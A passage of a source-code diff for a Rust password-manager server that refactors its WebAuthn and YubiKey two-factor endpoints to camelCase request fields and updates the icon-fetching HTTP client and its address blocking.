async fn activate_webauthn(data: Json<EnableWebauthnData>, headers: Headers, mut conn: DbConn) -> JsonResult {
|
||||||
let data: EnableWebauthnData = data.into_inner().data;
|
let data: EnableWebauthnData = data.into_inner();
|
||||||
let mut user = headers.user;
|
let mut user = headers.user;
|
||||||
|
|
||||||
PasswordOrOtpData {
|
PasswordOrOtpData {
|
||||||
MasterPasswordHash: data.MasterPasswordHash,
|
master_password_hash: data.master_password_hash,
|
||||||
Otp: data.Otp,
|
otp: data.otp,
|
||||||
}
|
}
|
||||||
.validate(&user, true, &mut conn)
|
.validate(&user, true, &mut conn)
|
||||||
.await?;
|
.await?;
|
||||||
@@ -274,13 +262,13 @@ async fn activate_webauthn(data: JsonUpcase<EnableWebauthnData>, headers: Header
|
|||||||
|
|
||||||
// Verify the credentials with the saved state
|
// Verify the credentials with the saved state
|
||||||
let (credential, _data) =
|
let (credential, _data) =
|
||||||
WebauthnConfig::load().register_credential(&data.DeviceResponse.into(), &state, |_| Ok(false))?;
|
WebauthnConfig::load().register_credential(&data.device_response.into(), &state, |_| Ok(false))?;
|
||||||
|
|
||||||
let mut registrations: Vec<_> = get_webauthn_registrations(&user.uuid, &mut conn).await?.1;
|
let mut registrations: Vec<_> = get_webauthn_registrations(&user.uuid, &mut conn).await?.1;
|
||||||
// TODO: Check for repeated ID's
|
// TODO: Check for repeated ID's
|
||||||
registrations.push(WebauthnRegistration {
|
registrations.push(WebauthnRegistration {
|
||||||
id: data.Id.into_i32()?,
|
id: data.id.into_i32()?,
|
||||||
name: data.Name,
|
name: data.name,
|
||||||
migrated: false,
|
migrated: false,
|
||||||
|
|
||||||
credential,
|
credential,
|
||||||
@@ -296,42 +284,41 @@ async fn activate_webauthn(data: JsonUpcase<EnableWebauthnData>, headers: Header
|
|||||||
|
|
||||||
let keys_json: Vec<Value> = registrations.iter().map(WebauthnRegistration::to_json).collect();
|
let keys_json: Vec<Value> = registrations.iter().map(WebauthnRegistration::to_json).collect();
|
||||||
Ok(Json(json!({
|
Ok(Json(json!({
|
||||||
"Enabled": true,
|
"enabled": true,
|
||||||
"Keys": keys_json,
|
"keys": keys_json,
|
||||||
"Object": "twoFactorU2f"
|
"object": "twoFactorU2f"
|
||||||
})))
|
})))
|
||||||
}
|
}
|
||||||
|
|
||||||
#[put("/two-factor/webauthn", data = "<data>")]
|
#[put("/two-factor/webauthn", data = "<data>")]
|
||||||
async fn activate_webauthn_put(data: JsonUpcase<EnableWebauthnData>, headers: Headers, conn: DbConn) -> JsonResult {
|
async fn activate_webauthn_put(data: Json<EnableWebauthnData>, headers: Headers, conn: DbConn) -> JsonResult {
|
||||||
activate_webauthn(data, headers, conn).await
|
activate_webauthn(data, headers, conn).await
|
||||||
}
|
}
|
||||||
|
|
||||||
#[derive(Deserialize, Debug)]
|
#[derive(Debug, Deserialize)]
|
||||||
#[allow(non_snake_case)]
|
#[serde(rename_all = "camelCase")]
|
||||||
struct DeleteU2FData {
|
struct DeleteU2FData {
|
||||||
Id: NumberOrString,
|
id: NumberOrString,
|
||||||
MasterPasswordHash: String,
|
master_password_hash: String,
|
||||||
}
|
}
|
||||||
|
|
||||||
#[delete("/two-factor/webauthn", data = "<data>")]
|
#[delete("/two-factor/webauthn", data = "<data>")]
|
||||||
async fn delete_webauthn(data: JsonUpcase<DeleteU2FData>, headers: Headers, mut conn: DbConn) -> JsonResult {
|
async fn delete_webauthn(data: Json<DeleteU2FData>, headers: Headers, mut conn: DbConn) -> JsonResult {
|
||||||
let id = data.data.Id.into_i32()?;
|
let id = data.id.into_i32()?;
|
||||||
if !headers.user.check_valid_password(&data.data.MasterPasswordHash) {
|
if !headers.user.check_valid_password(&data.master_password_hash) {
|
||||||
err!("Invalid password");
|
err!("Invalid password");
|
||||||
}
|
}
|
||||||
|
|
||||||
let mut tf =
|
let Some(mut tf) =
|
||||||
match TwoFactor::find_by_user_and_type(&headers.user.uuid, TwoFactorType::Webauthn as i32, &mut conn).await {
|
TwoFactor::find_by_user_and_type(&headers.user.uuid, TwoFactorType::Webauthn as i32, &mut conn).await
|
||||||
Some(tf) => tf,
|
else {
|
||||||
None => err!("Webauthn data not found!"),
|
err!("Webauthn data not found!")
|
||||||
};
|
};
|
||||||
|
|
||||||
let mut data: Vec<WebauthnRegistration> = serde_json::from_str(&tf.data)?;
|
let mut data: Vec<WebauthnRegistration> = serde_json::from_str(&tf.data)?;
|
||||||
|
|
||||||
let item_pos = match data.iter().position(|r| r.id == id) {
|
let Some(item_pos) = data.iter().position(|r| r.id == id) else {
|
||||||
Some(p) => p,
|
err!("Webauthn entry not found")
|
||||||
None => err!("Webauthn entry not found"),
|
|
||||||
};
|
};
|
||||||
|
|
||||||
let removed_item = data.remove(item_pos);
|
let removed_item = data.remove(item_pos);
|
||||||
@@ -358,27 +345,27 @@ async fn delete_webauthn(data: JsonUpcase<DeleteU2FData>, headers: Headers, mut
|
|||||||
let keys_json: Vec<Value> = data.iter().map(WebauthnRegistration::to_json).collect();
|
let keys_json: Vec<Value> = data.iter().map(WebauthnRegistration::to_json).collect();
|
||||||
|
|
||||||
Ok(Json(json!({
|
Ok(Json(json!({
|
||||||
"Enabled": true,
|
"enabled": true,
|
||||||
"Keys": keys_json,
|
"keys": keys_json,
|
||||||
"Object": "twoFactorU2f"
|
"object": "twoFactorU2f"
|
||||||
})))
|
})))
|
||||||
}
|
}
|
||||||
|
|
||||||
pub async fn get_webauthn_registrations(
|
pub async fn get_webauthn_registrations(
|
||||||
user_uuid: &str,
|
user_id: &UserId,
|
||||||
conn: &mut DbConn,
|
conn: &mut DbConn,
|
||||||
) -> Result<(bool, Vec<WebauthnRegistration>), Error> {
|
) -> Result<(bool, Vec<WebauthnRegistration>), Error> {
|
||||||
let type_ = TwoFactorType::Webauthn as i32;
|
let type_ = TwoFactorType::Webauthn as i32;
|
||||||
match TwoFactor::find_by_user_and_type(user_uuid, type_, conn).await {
|
match TwoFactor::find_by_user_and_type(user_id, type_, conn).await {
|
||||||
Some(tf) => Ok((tf.enabled, serde_json::from_str(&tf.data)?)),
|
Some(tf) => Ok((tf.enabled, serde_json::from_str(&tf.data)?)),
|
||||||
None => Ok((false, Vec::new())), // If no data, return empty list
|
None => Ok((false, Vec::new())), // If no data, return empty list
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
pub async fn generate_webauthn_login(user_uuid: &str, conn: &mut DbConn) -> JsonResult {
|
pub async fn generate_webauthn_login(user_id: &UserId, conn: &mut DbConn) -> JsonResult {
|
||||||
// Load saved credentials
|
// Load saved credentials
|
||||||
let creds: Vec<Credential> =
|
let creds: Vec<Credential> =
|
||||||
get_webauthn_registrations(user_uuid, conn).await?.1.into_iter().map(|r| r.credential).collect();
|
get_webauthn_registrations(user_id, conn).await?.1.into_iter().map(|r| r.credential).collect();
|
||||||
|
|
||||||
if creds.is_empty() {
|
if creds.is_empty() {
|
||||||
err!("No Webauthn devices registered")
|
err!("No Webauthn devices registered")
|
||||||
@@ -389,7 +376,7 @@ pub async fn generate_webauthn_login(user_uuid: &str, conn: &mut DbConn) -> Json
|
|||||||
let (response, state) = WebauthnConfig::load().generate_challenge_authenticate_options(creds, Some(ext))?;
|
let (response, state) = WebauthnConfig::load().generate_challenge_authenticate_options(creds, Some(ext))?;
|
||||||
|
|
||||||
// Save the challenge state for later validation
|
// Save the challenge state for later validation
|
||||||
TwoFactor::new(user_uuid.into(), TwoFactorType::WebauthnLoginChallenge, serde_json::to_string(&state)?)
|
TwoFactor::new(user_id.clone(), TwoFactorType::WebauthnLoginChallenge, serde_json::to_string(&state)?)
|
||||||
.save(conn)
|
.save(conn)
|
||||||
.await?;
|
.await?;
|
||||||
|
|
||||||
@@ -397,9 +384,9 @@ pub async fn generate_webauthn_login(user_uuid: &str, conn: &mut DbConn) -> Json
|
|||||||
Ok(Json(serde_json::to_value(response.public_key)?))
|
Ok(Json(serde_json::to_value(response.public_key)?))
|
||||||
}
|
}
|
||||||
|
|
||||||
pub async fn validate_webauthn_login(user_uuid: &str, response: &str, conn: &mut DbConn) -> EmptyResult {
|
pub async fn validate_webauthn_login(user_id: &UserId, response: &str, conn: &mut DbConn) -> EmptyResult {
|
||||||
let type_ = TwoFactorType::WebauthnLoginChallenge as i32;
|
let type_ = TwoFactorType::WebauthnLoginChallenge as i32;
|
||||||
let state = match TwoFactor::find_by_user_and_type(user_uuid, type_, conn).await {
|
let state = match TwoFactor::find_by_user_and_type(user_id, type_, conn).await {
|
||||||
Some(tf) => {
|
Some(tf) => {
|
||||||
let state: AuthenticationState = serde_json::from_str(&tf.data)?;
|
let state: AuthenticationState = serde_json::from_str(&tf.data)?;
|
||||||
tf.delete(conn).await?;
|
tf.delete(conn).await?;
|
||||||
@@ -413,10 +400,10 @@ pub async fn validate_webauthn_login(user_uuid: &str, response: &str, conn: &mut
|
|||||||
),
|
),
|
||||||
};
|
};
|
||||||
|
|
||||||
let rsp: crate::util::UpCase<PublicKeyCredentialCopy> = serde_json::from_str(response)?;
|
let rsp: PublicKeyCredentialCopy = serde_json::from_str(response)?;
|
||||||
let rsp: PublicKeyCredential = rsp.data.into();
|
let rsp: PublicKeyCredential = rsp.into();
|
||||||
|
|
||||||
let mut registrations = get_webauthn_registrations(user_uuid, conn).await?.1;
|
let mut registrations = get_webauthn_registrations(user_id, conn).await?.1;
|
||||||
|
|
||||||
// If the credential we received is migrated from U2F, enable the U2F compatibility
|
// If the credential we received is migrated from U2F, enable the U2F compatibility
|
||||||
//let use_u2f = registrations.iter().any(|r| r.migrated && r.credential.cred_id == rsp.raw_id.0);
|
//let use_u2f = registrations.iter().any(|r| r.migrated && r.credential.cred_id == rsp.raw_id.0);
|
||||||
@@ -426,7 +413,7 @@ pub async fn validate_webauthn_login(user_uuid: &str, response: &str, conn: &mut
|
|||||||
if ®.credential.cred_id == cred_id {
|
if ®.credential.cred_id == cred_id {
|
||||||
reg.credential.counter = auth_data.counter;
|
reg.credential.counter = auth_data.counter;
|
||||||
|
|
||||||
TwoFactor::new(user_uuid.to_string(), TwoFactorType::Webauthn, serde_json::to_string(®istrations)?)
|
TwoFactor::new(user_id.clone(), TwoFactorType::Webauthn, serde_json::to_string(®istrations)?)
|
||||||
.save(conn)
|
.save(conn)
|
||||||
.await?;
|
.await?;
|
||||||
return Ok(());
|
return Ok(());
|
||||||
|
|||||||
@@ -1,12 +1,12 @@
|
|||||||
use rocket::serde::json::Json;
|
use rocket::serde::json::Json;
|
||||||
use rocket::Route;
|
use rocket::Route;
|
||||||
use serde_json::Value;
|
use serde_json::Value;
|
||||||
use yubico::{config::Config, verify};
|
use yubico::{config::Config, verify_async};
|
||||||
|
|
||||||
use crate::{
|
use crate::{
|
||||||
api::{
|
api::{
|
||||||
core::{log_user_event, two_factor::_generate_recover_code},
|
core::{log_user_event, two_factor::_generate_recover_code},
|
||||||
EmptyResult, JsonResult, JsonUpcase, PasswordOrOtpData,
|
EmptyResult, JsonResult, PasswordOrOtpData,
|
||||||
},
|
},
|
||||||
auth::Headers,
|
auth::Headers,
|
||||||
db::{
|
db::{
|
||||||
@@ -21,33 +21,35 @@ pub fn routes() -> Vec<Route> {
|
|||||||
routes![generate_yubikey, activate_yubikey, activate_yubikey_put,]
|
routes![generate_yubikey, activate_yubikey, activate_yubikey_put,]
|
||||||
}
|
}
|
||||||
|
|
||||||
#[derive(Deserialize, Debug)]
|
#[derive(Debug, Deserialize)]
|
||||||
#[allow(non_snake_case)]
|
#[serde(rename_all = "camelCase")]
|
||||||
struct EnableYubikeyData {
|
struct EnableYubikeyData {
|
||||||
Key1: Option<String>,
|
key1: Option<String>,
|
||||||
Key2: Option<String>,
|
key2: Option<String>,
|
||||||
Key3: Option<String>,
|
key3: Option<String>,
|
||||||
Key4: Option<String>,
|
key4: Option<String>,
|
||||||
Key5: Option<String>,
|
key5: Option<String>,
|
||||||
Nfc: bool,
|
nfc: bool,
|
||||||
MasterPasswordHash: Option<String>,
|
master_password_hash: Option<String>,
|
||||||
Otp: Option<String>,
|
otp: Option<String>,
|
||||||
}
|
}
|
||||||
|
|
||||||
#[derive(Deserialize, Serialize, Debug)]
|
#[derive(Deserialize, Serialize, Debug)]
|
||||||
#[allow(non_snake_case)]
|
#[serde(rename_all = "camelCase")]
|
||||||
pub struct YubikeyMetadata {
|
pub struct YubikeyMetadata {
|
||||||
Keys: Vec<String>,
|
#[serde(rename = "keys", alias = "Keys")]
|
||||||
pub Nfc: bool,
|
keys: Vec<String>,
|
||||||
|
#[serde(rename = "nfc", alias = "Nfc")]
|
||||||
|
pub nfc: bool,
|
||||||
}
|
}
|
||||||
|
|
||||||
fn parse_yubikeys(data: &EnableYubikeyData) -> Vec<String> {
|
fn parse_yubikeys(data: &EnableYubikeyData) -> Vec<String> {
|
||||||
let data_keys = [&data.Key1, &data.Key2, &data.Key3, &data.Key4, &data.Key5];
|
let data_keys = [&data.key1, &data.key2, &data.key3, &data.key4, &data.key5];
|
||||||
|
|
||||||
data_keys.iter().filter_map(|e| e.as_ref().cloned()).collect()
|
data_keys.iter().filter_map(|e| e.as_ref().cloned()).collect()
|
||||||
}
|
}
|
||||||
|
|
||||||
fn jsonify_yubikeys(yubikeys: Vec<String>) -> serde_json::Value {
|
fn jsonify_yubikeys(yubikeys: Vec<String>) -> Value {
|
||||||
let mut result = Value::Object(serde_json::Map::new());
|
let mut result = Value::Object(serde_json::Map::new());
|
||||||
|
|
||||||
for (i, key) in yubikeys.into_iter().enumerate() {
|
for (i, key) in yubikeys.into_iter().enumerate() {
|
||||||
@@ -74,56 +76,53 @@ async fn verify_yubikey_otp(otp: String) -> EmptyResult {
|
|||||||
let config = Config::default().set_client_id(yubico_id).set_key(yubico_secret);
|
let config = Config::default().set_client_id(yubico_id).set_key(yubico_secret);
|
||||||
|
|
||||||
match CONFIG.yubico_server() {
|
match CONFIG.yubico_server() {
|
||||||
Some(server) => {
|
Some(server) => verify_async(otp, config.set_api_hosts(vec![server])).await,
|
||||||
tokio::task::spawn_blocking(move || verify(otp, config.set_api_hosts(vec![server]))).await.unwrap()
|
None => verify_async(otp, config).await,
|
||||||
}
|
|
||||||
None => tokio::task::spawn_blocking(move || verify(otp, config)).await.unwrap(),
|
|
||||||
}
|
}
|
||||||
.map_res("Failed to verify OTP")
|
.map_res("Failed to verify OTP")
|
||||||
.and(Ok(()))
|
|
||||||
}
|
}
|
||||||
|
|
||||||
#[post("/two-factor/get-yubikey", data = "<data>")]
|
#[post("/two-factor/get-yubikey", data = "<data>")]
|
||||||
async fn generate_yubikey(data: JsonUpcase<PasswordOrOtpData>, headers: Headers, mut conn: DbConn) -> JsonResult {
|
async fn generate_yubikey(data: Json<PasswordOrOtpData>, headers: Headers, mut conn: DbConn) -> JsonResult {
|
||||||
// Make sure the credentials are set
|
// Make sure the credentials are set
|
||||||
get_yubico_credentials()?;
|
get_yubico_credentials()?;
|
||||||
|
|
||||||
let data: PasswordOrOtpData = data.into_inner().data;
|
let data: PasswordOrOtpData = data.into_inner();
|
||||||
let user = headers.user;
|
let user = headers.user;
|
||||||
|
|
||||||
data.validate(&user, false, &mut conn).await?;
|
data.validate(&user, false, &mut conn).await?;
|
||||||
|
|
||||||
let user_uuid = &user.uuid;
|
let user_id = &user.uuid;
|
||||||
let yubikey_type = TwoFactorType::YubiKey as i32;
|
let yubikey_type = TwoFactorType::YubiKey as i32;
|
||||||
|
|
||||||
let r = TwoFactor::find_by_user_and_type(user_uuid, yubikey_type, &mut conn).await;
|
let r = TwoFactor::find_by_user_and_type(user_id, yubikey_type, &mut conn).await;
|
||||||
|
|
||||||
if let Some(r) = r {
|
if let Some(r) = r {
|
||||||
let yubikey_metadata: YubikeyMetadata = serde_json::from_str(&r.data)?;
|
let yubikey_metadata: YubikeyMetadata = serde_json::from_str(&r.data)?;
|
||||||
|
|
||||||
let mut result = jsonify_yubikeys(yubikey_metadata.Keys);
|
let mut result = jsonify_yubikeys(yubikey_metadata.keys);
|
||||||
|
|
||||||
result["Enabled"] = Value::Bool(true);
|
result["enabled"] = Value::Bool(true);
|
||||||
result["Nfc"] = Value::Bool(yubikey_metadata.Nfc);
|
result["nfc"] = Value::Bool(yubikey_metadata.nfc);
|
||||||
result["Object"] = Value::String("twoFactorU2f".to_owned());
|
result["object"] = Value::String("twoFactorU2f".to_owned());
|
||||||
|
|
||||||
Ok(Json(result))
|
Ok(Json(result))
|
||||||
} else {
|
} else {
|
||||||
Ok(Json(json!({
|
Ok(Json(json!({
|
||||||
"Enabled": false,
|
"enabled": false,
|
||||||
"Object": "twoFactorU2f",
|
"object": "twoFactorU2f",
|
||||||
})))
|
})))
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
#[post("/two-factor/yubikey", data = "<data>")]
|
#[post("/two-factor/yubikey", data = "<data>")]
|
||||||
async fn activate_yubikey(data: JsonUpcase<EnableYubikeyData>, headers: Headers, mut conn: DbConn) -> JsonResult {
|
async fn activate_yubikey(data: Json<EnableYubikeyData>, headers: Headers, mut conn: DbConn) -> JsonResult {
|
||||||
let data: EnableYubikeyData = data.into_inner().data;
|
let data: EnableYubikeyData = data.into_inner();
|
||||||
let mut user = headers.user;
|
let mut user = headers.user;
|
||||||
|
|
||||||
PasswordOrOtpData {
|
PasswordOrOtpData {
|
||||||
MasterPasswordHash: data.MasterPasswordHash.clone(),
|
master_password_hash: data.master_password_hash.clone(),
|
||||||
Otp: data.Otp.clone(),
|
otp: data.otp.clone(),
|
||||||
}
|
}
|
||||||
.validate(&user, true, &mut conn)
|
.validate(&user, true, &mut conn)
|
||||||
.await?;
|
.await?;
|
||||||
@@ -139,26 +138,25 @@ async fn activate_yubikey(data: JsonUpcase<EnableYubikeyData>, headers: Headers,
|
|||||||
|
|
||||||
if yubikeys.is_empty() {
|
if yubikeys.is_empty() {
|
||||||
return Ok(Json(json!({
|
return Ok(Json(json!({
|
||||||
"Enabled": false,
|
"enabled": false,
|
||||||
"Object": "twoFactorU2f",
|
"object": "twoFactorU2f",
|
||||||
})));
|
})));
|
||||||
}
|
}
|
||||||
|
|
||||||
// Ensure they are valid OTPs
|
// Ensure they are valid OTPs
|
||||||
for yubikey in &yubikeys {
|
for yubikey in &yubikeys {
|
||||||
if yubikey.len() == 12 {
|
if yubikey.is_empty() || yubikey.len() == 12 {
|
||||||
// YubiKey ID
|
|
||||||
continue;
|
continue;
|
||||||
}
|
}
|
||||||
|
|
||||||
verify_yubikey_otp(yubikey.to_owned()).await.map_res("Invalid Yubikey OTP provided")?;
|
verify_yubikey_otp(yubikey.to_owned()).await.map_res("Invalid Yubikey OTP provided")?;
|
||||||
}
|
}
|
||||||
|
|
||||||
let yubikey_ids: Vec<String> = yubikeys.into_iter().map(|x| (x[..12]).to_owned()).collect();
|
let yubikey_ids: Vec<String> = yubikeys.into_iter().filter_map(|x| x.get(..12).map(str::to_owned)).collect();
|
||||||
|
|
||||||
let yubikey_metadata = YubikeyMetadata {
|
let yubikey_metadata = YubikeyMetadata {
|
||||||
Keys: yubikey_ids,
|
keys: yubikey_ids,
|
||||||
Nfc: data.Nfc,
|
nfc: data.nfc,
|
||||||
};
|
};
|
||||||
|
|
||||||
yubikey_data.data = serde_json::to_string(&yubikey_metadata).unwrap();
|
yubikey_data.data = serde_json::to_string(&yubikey_metadata).unwrap();
|
||||||
@@ -168,17 +166,17 @@ async fn activate_yubikey(data: JsonUpcase<EnableYubikeyData>, headers: Headers,
|
|||||||
|
|
||||||
log_user_event(EventType::UserUpdated2fa as i32, &user.uuid, headers.device.atype, &headers.ip.ip, &mut conn).await;
|
log_user_event(EventType::UserUpdated2fa as i32, &user.uuid, headers.device.atype, &headers.ip.ip, &mut conn).await;
|
||||||
|
|
||||||
let mut result = jsonify_yubikeys(yubikey_metadata.Keys);
|
let mut result = jsonify_yubikeys(yubikey_metadata.keys);
|
||||||
|
|
||||||
result["Enabled"] = Value::Bool(true);
|
result["enabled"] = Value::Bool(true);
|
||||||
result["Nfc"] = Value::Bool(yubikey_metadata.Nfc);
|
result["nfc"] = Value::Bool(yubikey_metadata.nfc);
|
||||||
result["Object"] = Value::String("twoFactorU2f".to_owned());
|
result["object"] = Value::String("twoFactorU2f".to_owned());
|
||||||
|
|
||||||
Ok(Json(result))
|
Ok(Json(result))
|
||||||
}
|
}
|
||||||
|
|
||||||
#[put("/two-factor/yubikey", data = "<data>")]
|
#[put("/two-factor/yubikey", data = "<data>")]
|
||||||
async fn activate_yubikey_put(data: JsonUpcase<EnableYubikeyData>, headers: Headers, conn: DbConn) -> JsonResult {
|
async fn activate_yubikey_put(data: Json<EnableYubikeyData>, headers: Headers, conn: DbConn) -> JsonResult {
|
||||||
activate_yubikey(data, headers, conn).await
|
activate_yubikey(data, headers, conn).await
|
||||||
}
|
}
|
||||||
|
|
||||||
@@ -190,14 +188,10 @@ pub async fn validate_yubikey_login(response: &str, twofactor_data: &str) -> Emp
|
|||||||
let yubikey_metadata: YubikeyMetadata = serde_json::from_str(twofactor_data).expect("Can't parse Yubikey Metadata");
|
let yubikey_metadata: YubikeyMetadata = serde_json::from_str(twofactor_data).expect("Can't parse Yubikey Metadata");
|
||||||
let response_id = &response[..12];
|
let response_id = &response[..12];
|
||||||
|
|
||||||
if !yubikey_metadata.Keys.contains(&response_id.to_owned()) {
|
if !yubikey_metadata.keys.contains(&response_id.to_owned()) {
|
||||||
err!("Given Yubikey is not registered");
|
err!("Given Yubikey is not registered");
|
||||||
}
|
}
|
||||||
|
|
||||||
let result = verify_yubikey_otp(response.to_owned()).await;
|
verify_yubikey_otp(response.to_owned()).await.map_res("Failed to verify Yubikey against OTP server")?;
|
||||||
|
Ok(())
|
||||||
match result {
|
|
||||||
Ok(_answer) => Ok(()),
|
|
||||||
Err(_e) => err!("Failed to verify Yubikey against OTP server"),
|
|
||||||
}
|
|
||||||
}
|
}
|
||||||
|
|||||||
495
src/api/icons.rs
495
src/api/icons.rs
@@ -1,4 +1,5 @@
|
|||||||
use std::{
|
use std::{
|
||||||
|
collections::HashMap,
|
||||||
net::IpAddr,
|
net::IpAddr,
|
||||||
sync::Arc,
|
sync::Arc,
|
||||||
time::{Duration, SystemTime},
|
time::{Duration, SystemTime},
|
||||||
@@ -13,17 +14,15 @@ use reqwest::{
|
|||||||
Client, Response,
|
Client, Response,
|
||||||
};
|
};
|
||||||
use rocket::{http::ContentType, response::Redirect, Route};
|
use rocket::{http::ContentType, response::Redirect, Route};
|
||||||
use tokio::{
|
use svg_hush::{data_url_filter, Filter};
|
||||||
fs::{create_dir_all, remove_file, symlink_metadata, File},
|
|
||||||
io::{AsyncReadExt, AsyncWriteExt},
|
|
||||||
net::lookup_host,
|
|
||||||
};
|
|
||||||
|
|
||||||
use html5gum::{Emitter, HtmlString, InfallibleTokenizer, Readable, StringReader, Tokenizer};
|
use html5gum::{Emitter, HtmlString, Readable, StringReader, Tokenizer};
|
||||||
|
|
||||||
use crate::{
|
use crate::{
|
||||||
|
config::PathType,
|
||||||
error::Error,
|
error::Error,
|
||||||
util::{get_reqwest_client_builder, Cached},
|
http_client::{get_reqwest_client_builder, should_block_address, CustomHttpClientError},
|
||||||
|
util::Cached,
|
||||||
CONFIG,
|
CONFIG,
|
||||||
};
|
};
|
||||||
|
|
||||||
@@ -37,11 +36,29 @@ pub fn routes() -> Vec<Route> {
|
|||||||
static CLIENT: Lazy<Client> = Lazy::new(|| {
|
static CLIENT: Lazy<Client> = Lazy::new(|| {
|
||||||
// Generate the default headers
|
// Generate the default headers
|
||||||
let mut default_headers = HeaderMap::new();
|
let mut default_headers = HeaderMap::new();
|
||||||
default_headers.insert(header::USER_AGENT, HeaderValue::from_static("Links (2.22; Linux X86_64; GNU C; text)"));
|
default_headers.insert(
|
||||||
default_headers.insert(header::ACCEPT, HeaderValue::from_static("text/html, text/*;q=0.5, image/*, */*;q=0.1"));
|
header::USER_AGENT,
|
||||||
default_headers.insert(header::ACCEPT_LANGUAGE, HeaderValue::from_static("en,*;q=0.1"));
|
HeaderValue::from_static(
|
||||||
|
"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36",
|
||||||
|
),
|
||||||
|
);
|
||||||
|
default_headers.insert(header::ACCEPT, HeaderValue::from_static("text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7"));
|
||||||
|
default_headers.insert(header::ACCEPT_LANGUAGE, HeaderValue::from_static("en-US,en;q=0.9"));
|
||||||
default_headers.insert(header::CACHE_CONTROL, HeaderValue::from_static("no-cache"));
|
default_headers.insert(header::CACHE_CONTROL, HeaderValue::from_static("no-cache"));
|
||||||
default_headers.insert(header::PRAGMA, HeaderValue::from_static("no-cache"));
|
default_headers.insert(header::PRAGMA, HeaderValue::from_static("no-cache"));
|
||||||
|
default_headers.insert(header::UPGRADE_INSECURE_REQUESTS, HeaderValue::from_static("1"));
|
||||||
|
|
||||||
|
default_headers.insert("Sec-Ch-Ua-Mobile", HeaderValue::from_static("?0"));
|
||||||
|
default_headers.insert("Sec-Ch-Ua-Platform", HeaderValue::from_static("Linux"));
|
||||||
|
default_headers.insert(
|
||||||
|
"Sec-Ch-Ua",
|
||||||
|
HeaderValue::from_static("\"Not)A;Brand\";v=\"8\", \"Chromium\";v=\"138\", \"Google Chrome\";v=\"138\""),
|
||||||
|
);
|
||||||
|
|
||||||
|
default_headers.insert("Sec-Fetch-Site", HeaderValue::from_static("none"));
|
||||||
|
default_headers.insert("Sec-Fetch-Mode", HeaderValue::from_static("navigate"));
|
||||||
|
default_headers.insert("Sec-Fetch-User", HeaderValue::from_static("?1"));
|
||||||
|
default_headers.insert("Sec-Fetch-Dest", HeaderValue::from_static("document"));
|
||||||
|
|
||||||
// Generate the cookie store
|
// Generate the cookie store
|
||||||
let cookie_store = Arc::new(Jar::default());
|
let cookie_store = Arc::new(Jar::default());
|
||||||
@@ -49,48 +66,36 @@ static CLIENT: Lazy<Client> = Lazy::new(|| {
|
|||||||
let icon_download_timeout = Duration::from_secs(CONFIG.icon_download_timeout());
|
let icon_download_timeout = Duration::from_secs(CONFIG.icon_download_timeout());
|
||||||
let pool_idle_timeout = Duration::from_secs(10);
|
let pool_idle_timeout = Duration::from_secs(10);
|
||||||
// Reuse the client between requests
|
// Reuse the client between requests
|
||||||
let client = get_reqwest_client_builder()
|
get_reqwest_client_builder()
|
||||||
.cookie_provider(Arc::clone(&cookie_store))
|
.cookie_provider(Arc::clone(&cookie_store))
|
||||||
.timeout(icon_download_timeout)
|
.timeout(icon_download_timeout)
|
||||||
.pool_max_idle_per_host(5) // Configure the Hyper Pool to only have max 5 idle connections
|
.pool_max_idle_per_host(5) // Configure the Hyper Pool to only have max 5 idle connections
|
||||||
.pool_idle_timeout(pool_idle_timeout) // Configure the Hyper Pool to timeout after 10 seconds
|
.pool_idle_timeout(pool_idle_timeout) // Configure the Hyper Pool to timeout after 10 seconds
|
||||||
.trust_dns(true)
|
.default_headers(default_headers.clone())
|
||||||
.default_headers(default_headers.clone());
|
.http1_title_case_headers()
|
||||||
|
.build()
|
||||||
match client.build() {
|
.expect("Failed to build client")
|
||||||
Ok(client) => client,
|
|
||||||
Err(e) => {
|
|
||||||
error!("Possible trust-dns error, trying with trust-dns disabled: '{e}'");
|
|
||||||
get_reqwest_client_builder()
|
|
||||||
.cookie_provider(cookie_store)
|
|
||||||
.timeout(icon_download_timeout)
|
|
||||||
.pool_max_idle_per_host(5) // Configure the Hyper Pool to only have max 5 idle connections
|
|
||||||
.pool_idle_timeout(pool_idle_timeout) // Configure the Hyper Pool to timeout after 10 seconds
|
|
||||||
.trust_dns(false)
|
|
||||||
.default_headers(default_headers)
|
|
||||||
.build()
|
|
||||||
.expect("Failed to build client")
|
|
||||||
}
|
|
||||||
}
|
|
||||||
});
|
});
|
||||||
|
|
||||||
// Build Regex only once since this takes a lot of time.
|
// Build Regex only once since this takes a lot of time.
|
||||||
static ICON_SIZE_REGEX: Lazy<Regex> = Lazy::new(|| Regex::new(r"(?x)(\d+)\D*(\d+)").unwrap());
|
static ICON_SIZE_REGEX: Lazy<Regex> = Lazy::new(|| Regex::new(r"(?x)(\d+)\D*(\d+)").unwrap());
|
||||||
|
|
||||||
// Special HashMap which holds the user defined Regex to speedup matching the regex.
|
// The function name `icon_external` is checked in the `on_response` function in `AppHeaders`
|
||||||
static ICON_BLACKLIST_REGEX: Lazy<dashmap::DashMap<String, Regex>> = Lazy::new(dashmap::DashMap::new);
|
// It is used to prevent sending a specific header which breaks icon downloads.
|
||||||
|
// If this function needs to be renamed, also adjust the code in `util.rs`
|
||||||
async fn icon_redirect(domain: &str, template: &str) -> Option<Redirect> {
|
#[get("/<domain>/icon.png")]
|
||||||
|
fn icon_external(domain: &str) -> Option<Redirect> {
|
||||||
if !is_valid_domain(domain) {
|
if !is_valid_domain(domain) {
|
||||||
warn!("Invalid domain: {}", domain);
|
warn!("Invalid domain: {domain}");
|
||||||
return None;
|
return None;
|
||||||
}
|
}
|
||||||
|
|
||||||
if check_domain_blacklist_reason(domain).await.is_some() {
|
if should_block_address(domain) {
|
||||||
|
warn!("Blocked address: {domain}");
|
||||||
return None;
|
return None;
|
||||||
}
|
}
|
||||||
|
|
||||||
let url = template.replace("{}", domain);
|
let url = CONFIG._icon_service_url().replace("{}", domain);
|
||||||
match CONFIG.icon_redirect_code() {
|
match CONFIG.icon_redirect_code() {
|
||||||
301 => Some(Redirect::moved(url)), // legacy permanent redirect
|
301 => Some(Redirect::moved(url)), // legacy permanent redirect
|
||||||
302 => Some(Redirect::found(url)), // legacy temporary redirect
|
302 => Some(Redirect::found(url)), // legacy temporary redirect
|
||||||
